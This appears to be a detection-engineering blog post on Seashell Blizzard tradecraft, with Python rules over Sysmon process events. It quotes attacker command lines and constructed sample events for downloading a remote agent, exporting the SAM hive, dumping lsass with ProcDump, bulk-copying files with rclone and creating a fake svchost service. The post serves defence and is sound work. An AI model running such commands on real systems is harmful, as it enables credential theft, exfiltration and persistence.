044. Seashell Blizzard Detection: That Easy?
Hello everyone! Today we'll look at another example of an Advanced Persistent Threat, and at how easy it actually is to detect the related malicious activity.
Microsoft Threat Intelligence has published a report on Seashell Blizzard - a high-impact threat actor that conducts global activities ranging from espionage to information operations and cyber-enabled disruption.
Let's explore one of the exploitation patterns, which involves vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788).
First, the threat actors abused bitsadmin to download the Atera installer:
bitsadmin /transfer debjob /download [link_to_installer] C:\ProgramData\temporary.msi
This is a very common malicious behaviour, observed in many ransomware cases as well.
They also abused curl to accomplish the same task:
curl -o setup.msi
In both cases the adversary downloaded the agent from *atera.com domains, so you can key on that domain in conjunction with bitsadmin and curl.
The threat actors leveraged EXTREMELY common credential access techniques. They used reg.exe to extract the related registry data, used a renamed ProcDump to dump lsass.exe, and abused Task Manager to do the same.
The adversaries also used another very common tool, often seen in ransomware gangs' arsenals - rclone:
rclone.exe --config [path_to_config] copy [target_directory] --ignore-case --ignore-existing --auto-confirm --multithread-streams 20 --transfers 20 --checkers 20 --tpslimit 20 --include *.docx [redacted] --max-size 1000M
As you can see, there are many interesting command line parameters you can use in detection engineering!
The threat actors also deployed ShadowLink malware and, again, used a very common persistence mechanism:
sc create system start= auto binPath= "C:\ProgramData\System\svchost.exe -nt-service -f C:\ProgramData\System\systemrc"
So, svchost.exe in C:\ProgramData? Nice try!
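To show how little it takes to catch every step above, here is a small set of detection rules written for this post (not from the Microsoft report or any vendor product). Each rule is a predicate over a Sysmon Event ID 1 style process-creation record; the field names (Image, CommandLine, OriginalFileName) are Sysmon's, but the sample events are constructed, the atera.com host and file paths are placeholders, and the reg.exe command form and ProcDump's OriginalFileName value are assumptions, since the post only describes those steps.

```python
"""Detection rules for the Seashell Blizzard tradecraft discussed above.

Added example, not code from the original post. Events are Sysmon Event ID 1
style dicts; all sample events below are constructed for illustration.
"""
import re

# Directories where a genuine svchost.exe lives (assumed default Windows layout).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# *.atera.com download URL inside a command line.
ATERA_RE = re.compile(r"https?://[a-z0-9.\-]*atera\.com\b")
# Registry hives that hold credential material (assumed form of the reg.exe step).
HIVES = ("hklm\\sam", "hklm\\security", "hklm\\system")
# rclone switches seen in the post's command line.
RCLONE_FLAGS = ("--config", "--transfers", "--checkers", "--include",
                "--max-size", "--ignore-existing", "--tpslimit")


def _cmd(e):  return (e.get("CommandLine") or "").lower()
def _orig(e): return (e.get("OriginalFileName") or "").lower()
def _base(e): return (e.get("Image") or "").lower().rsplit("\\", 1)[-1]


def rule_atera_download(e):
    """bitsadmin /transfer or curl -o fetching the agent from *.atera.com.
    Tune by excluding your own approved deployment tooling."""
    cmd = _cmd(e)
    if _base(e) not in ("bitsadmin.exe", "curl.exe"):
        return False
    return bool(ATERA_RE.search(cmd)) and (
        "/transfer" in cmd or " -o " in cmd or "--output" in cmd)


def rule_reg_hive_export(e):
    """reg.exe saving/exporting SAM, SECURITY or SYSTEM (assumed command form)."""
    cmd = _cmd(e)
    return (_base(e) == "reg.exe" and (" save " in cmd or " export " in cmd)
            and any(h in cmd for h in HIVES))


def rule_renamed_procdump_lsass(e):
    """PE OriginalFileName still says 'procdump' (assumption: Sysinternals keeps
    it) while the on-disk name differs, or the target is lsass."""
    if not _orig(e).startswith("procdump"):
        return False
    renamed = _base(e) not in ("procdump.exe", "procdump64.exe", "procdump64a.exe")
    return renamed or "lsass" in _cmd(e)


def rule_rclone_bulk_transfer(e):
    """rclone copy/sync/move with three or more of the tuning flags from the post."""
    cmd = _cmd(e)
    if _base(e) != "rclone.exe" and _orig(e) != "rclone.exe":
        return False
    verb = any(v in cmd for v in (" copy ", " sync ", " move "))
    return verb and sum(f in cmd for f in RCLONE_FLAGS) >= 3


def rule_service_binary_outside_system(e):
    """sc create whose binPath= points at an svchost.exe outside System32/SysWOW64.
    Event ID 7045 (service installed) is a good second source for the same logic."""
    cmd = _cmd(e)
    if _base(e) != "sc.exe" or " create " not in cmd or "binpath=" not in cmd:
        return False
    m = re.search(r'binpath=\s*"?([^"]+)', cmd)
    if not m:
        return False
    path = m.group(1).strip().split()[0]  # executable path before its arguments
    return path.endswith("svchost.exe") and not path.startswith(SYSTEM_DIRS)


RULES = {
    "atera_download": rule_atera_download,
    "reg_hive_export": rule_reg_hive_export,
    "renamed_procdump_lsass": rule_renamed_procdump_lsass,
    "rclone_bulk_transfer": rule_rclone_bulk_transfer,
    "service_binary_outside_system": rule_service_binary_outside_system,
}


def detect(event):
    """Names of all rules that fire for one event (sorted, possibly empty)."""
    return sorted(name for name, rule in RULES.items() if rule(event))


def triage(events):
    """Map event index -> fired rules, keeping only events that alerted."""
    return {i: hits for i, e in enumerate(events) if (hits := detect(e))}


# Constructed sample events modelled on the post's redacted command lines.
EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer debjob /download https://agent-example.atera.com/agent.msi C:\ProgramData\temporary.msi"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -o setup.msi https://agent-example.atera.com/setup.msi"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam C:\ProgramData\s.hiv"},
    {"Image": r"C:\ProgramData\upd.exe", "OriginalFileName": "procdump",
     "CommandLine": r"upd.exe lsass.exe C:\ProgramData\l.dmp"},
    {"Image": r"C:\ProgramData\rclone.exe",
     "CommandLine": r"rclone.exe --config C:\ProgramData\r.conf copy C:\Users\Public\Documents --ignore-case --ignore-existing --auto-confirm --multithread-streams 20 --transfers 20 --checkers 20 --tpslimit 20 --include *.docx remote:dst --max-size 1000M"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create system start= auto binPath= "C:\ProgramData\System\svchost.exe -nt-service -f C:\ProgramData\System\systemrc"'},
    # Benign controls: a real service host and an ordinary curl download.
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create LegitSvc start= auto binPath= "C:\Windows\System32\svchost.exe -k netsvcs"'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl -o page.html https://example.com/"},
]

if __name__ == "__main__":
    for idx, hits in triage(EVENTS).items():
        print(idx, hits, EVENTS[idx]["CommandLine"][:60])
```

Each rule deliberately matches on the things the actor cannot easily change (the download domain, the hive names, the PE's OriginalFileName, the service path outside System32) rather than on file names or job names, which are trivial to rename. The two benign events at the end are there to check that the rules stay quiet on a real svchost service and an unrelated curl download.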
See you tomorrow!